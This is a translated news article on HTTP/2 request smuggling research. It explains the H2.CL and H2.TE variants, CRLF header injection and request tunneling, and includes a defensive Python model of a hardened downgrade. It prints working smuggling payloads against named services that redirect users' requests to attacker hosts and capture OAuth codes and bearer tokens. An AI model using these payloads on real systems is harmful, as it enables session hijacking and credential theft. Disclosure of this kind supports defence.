A new attack on front-end/back-end systems allows wedging into other users' requests

Web systems whose frontend accepts connections over HTTP/2 and forwards them to the backend over HTTP/1.1 are exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted client requests, an attacker can wedge into the content of requests from other users that are processed in the same stream between the frontend and the backend. The attack can be used to inject malicious JavaScript code into a session with a legitimate web service, bypass access control systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are relayed in a frontend-backend scheme. The author of the study demonstrated the possibility of attacking the systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received 56 thousand dollars in bug bounty programs for finding the vulnerabilities. The problem has also been confirmed in F5 network products. The problem partially affects mod_proxy in the Apache http server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers simultaneously was blocked in the latest release (1.21.1). Attack tools have already been added to the Burp toolkit and are available in the form of the Turbo Intruder extension.

The principle behind the new method of wedging requests into traffic is similar to the vulnerability discovered by the same researcher two years ago, which was limited to frontends that accept requests over HTTP/1.1. Recall that in the frontend-backend scheme, client requests are received by an additional node, the frontend, which establishes a long-lived TCP connection to the backend that actually processes the requests. Requests from different users are usually transmitted over this shared connection, following one another in a chain and separated by means of the HTTP protocol.

The classic "HTTP Request Smuggling" attack was based on the frontend and the backend interpreting the HTTP headers "Content-Length" (defines the total amount of data in the request) and "Transfer-Encoding: chunked" (allows data to be transferred in parts) differently. For example, if the frontend supports only "Content-Length" but ignores "Transfer-Encoding: chunked", an attacker can send a request containing both "Content-Length" and "Transfer-Encoding: chunked" headers, where the size in "Content-Length" does not match the size of the chunked chain. In that case the frontend will process and forward the request according to "Content-Length", while the backend will wait for the block to complete based on "Transfer-Encoding: chunked", and the remaining tail of the attacker's request will end up at the beginning of someone else's request transmitted next.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and operates on data blocks of predetermined size. However, HTTP/2 uses pseudo-headers corresponding to the usual HTTP headers. When interacting with the backend over HTTP/1.1, the frontend translates these pseudo-headers into the equivalent HTTP/1.1 headers. The problem is that the backend makes its decisions about how to parse the stream based on the HTTP headers set by the frontend, without any knowledge of the parameters of the original request.

In particular, the "content-length" and "transfer-encoding" values can be transmitted as pseudo-headers even though they are not used in HTTP/2, where the size of all data is determined in a separate field. During the conversion of the HTTP/2 request to HTTP/1.1, however, these headers are passed through and can confuse the backend. There are two main attack variants, H2.TE and H2.CL, in which the backend is misled by substituting an incorrect transfer-encoding or content-length value that does not match the actual size of the request body the frontend received over HTTP/2.


One example of an H2.CL attack is specifying an incorrect size in the content-length pseudo-header when sending an HTTP/2 request to Netflix. This request leads to the addition of an equivalent Content-Length HTTP header when the backend is accessed over HTTP/1.1, but since the size specified in Content-Length is smaller than the actual one, part of the data in the tail is processed as the beginning of the next request.

For example, the HTTP/2 request:

    :method POST
    :path /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

will result in the following request being sent to the backend:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since content-length has the value 4, the backend will accept only "abcd" as the body of the request, and the remaining "GET /n HTTP/1.1..." will be processed as the beginning of the next request, which belongs to another user. As a result, the stream becomes desynchronized and the response to the next request will be the result of processing the dummy request. In the case of Netflix, specifying a third-party host in the "Host:" header of the dummy request caused the client to receive a "Location: https://02.rs?x.netflix.com/n" response, which allowed arbitrary content to be delivered to the client, including execution of the attacker's JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves substituting the "Transfer-Encoding: chunked" header. The use of the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, which requires requests containing it to be treated as malformed. Despite this, some frontend implementations do not honour this requirement and allow the transfer-encoding pseudo-header in HTTP/2, which is then converted into the equivalent HTTP header. If a "Transfer-Encoding" header is present, the backend may give it priority and parse the data in "chunked" mode, using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the original framing by total size.

The presence of such a discrepancy was demonstrated using Verizon as an example. The problem concerned the authentication portal and content management system, which are also used on sites such as Huffington Post and Engadget. For example, the client request over HTTP/2:

    :method POST
    :path /identitfy/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

results in the following HTTP/1.1 request being sent to the backend:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The backend, in turn, ignored the "Content-Length" header and split the stream based on "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's site, including intercepting requests related to OAuth authentication (whose parameters were exposed in the Referer header), as well as imitating the authentication session and causing the user's system to send credentials to the attacker's host. Examples of the captured requests:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…

To attack HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified, another method was proposed: the "Transfer-Encoding" header is smuggled by appending it to another pseudo-header, separated by a newline character (when converted to HTTP/1.1, this produces two separate HTTP headers).

For example, the problem affected Atlassian Jira and Netlify CDN (which serves the Mozilla start page in Firefox). Specifically, the HTTP/2 request:

    :method POST
    :path /
    :authority start.mozilla.org
    foo b\r\n
    transfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

resulted in the following HTTP/1.1 request being sent to the backend:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another option for smuggling the "Transfer-Encoding" header is to append it to the name of another pseudo-header or to the line containing the request method. For example, when accessing Atlassian Jira, a pseudo-header named "foo:bar\r\ntransfer-encoding" with the value "chunked" caused the HTTP headers "foo:bar" and "transfer-encoding: chunked" to be added, and setting the ":method" pseudo-header to the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" was translated into "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
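The following model, added here as an illustration and not taken from the research or any of the affected products, replays the H2.CL example above through two hypothetical frontends: a naive downgrade that copies HTTP/2 header fields into HTTP/1.1 verbatim, and a hardened one that derives Content-Length from the body actually received, drops client-supplied framing headers and rejects the CR/LF injection into header names, values and pseudo-headers used in the H2.TE variants. A minimal Content-Length-only backend parser shows how many requests each variant produces on the shared connection.

```python
import re
# Constructed HTTP/2 request modelled on the H2.CL example above: the
# content-length pseudo-header claims 4 bytes, but the body is longer.
H2_REQUEST = {
    "headers": [(":method", "POST"), (":path", "/n"),
                (":authority", "www.netflix.com"), ("content-length", "4")],
    "body": b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar\r\n\r\n",
}

def _start(req):
    h = dict(req["headers"])
    return [f"{h[':method']} {h[':path']} HTTP/1.1", f"Host: {h[':authority']}"]

def downgrade_naive(req):
    """Hypothetical frontend that copies HTTP/2 fields into HTTP/1.1 verbatim (vulnerable)."""
    lines = _start(req)
    for name, value in req["headers"]:
        if not name.startswith(":"):
            lines.append(f"{name.title()}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + req["body"]

_FORBIDDEN = {"content-length", "transfer-encoding", "connection"}
_CTL = re.compile(r"[\r\n\x00]")

def downgrade_safe(req):
    """Hardened downgrade: CR/LF/NUL in any field (pseudo-headers included) is rejected,
    client-supplied framing headers are dropped, and Content-Length is taken from the body
    length actually received in HTTP/2 frames (RFC 9113 treats such requests as malformed)."""
    lines = _start(req)
    for name, value in req["headers"]:
        if _CTL.search(name) or _CTL.search(value):
            raise ValueError(f"control character in header field {name!r}")
        if name.startswith(":") or name.lower() in _FORBIDDEN:
            continue
        lines.append(f"{name.title()}: {value}")
    lines.append(f"Content-Length: {len(req['body'])}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + req["body"]

def backend_split(stream):
    """Backend that frames requests on a keep-alive connection by Content-Length only.
    Returns the (request-line, body) pairs it believes it received."""
    seen = []
    while stream:
        head, _, rest = stream.partition(b"\r\n\r\n")
        m = re.search(rb"(?im)^content-length:[ \t]*(\d+)[ \t]*\r?$", head)
        n = int(m.group(1)) if m else 0
        seen.append((head.split(b"\r\n")[0].decode(), rest[:n]))
        stream = rest[n:]
    return seen
```

With the naive downgrade, `backend_split` reports two requests, the second being the smuggled "GET /n HTTP/1.1"; with the hardened one it reports a single POST whose body is the whole payload.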

The researcher who identified the problem also proposed a request tunneling technique for attacking frontends in which each IP address gets a separate connection to the backend, so that traffic from different users is not mixed. The proposed technique does not allow interfering with other users' requests, but it makes it possible to poison a shared cache, which affects the processing of other requests, and to substitute internal HTTP headers that are used to pass service information from the frontend to the backend (for example, when authentication is performed on the frontend side, such headers may carry information about the current user to the backend). As an example of applying the method in practice, cache poisoning made it possible to gain control of pages on the Bitbucket service.

Source: opennet.ru
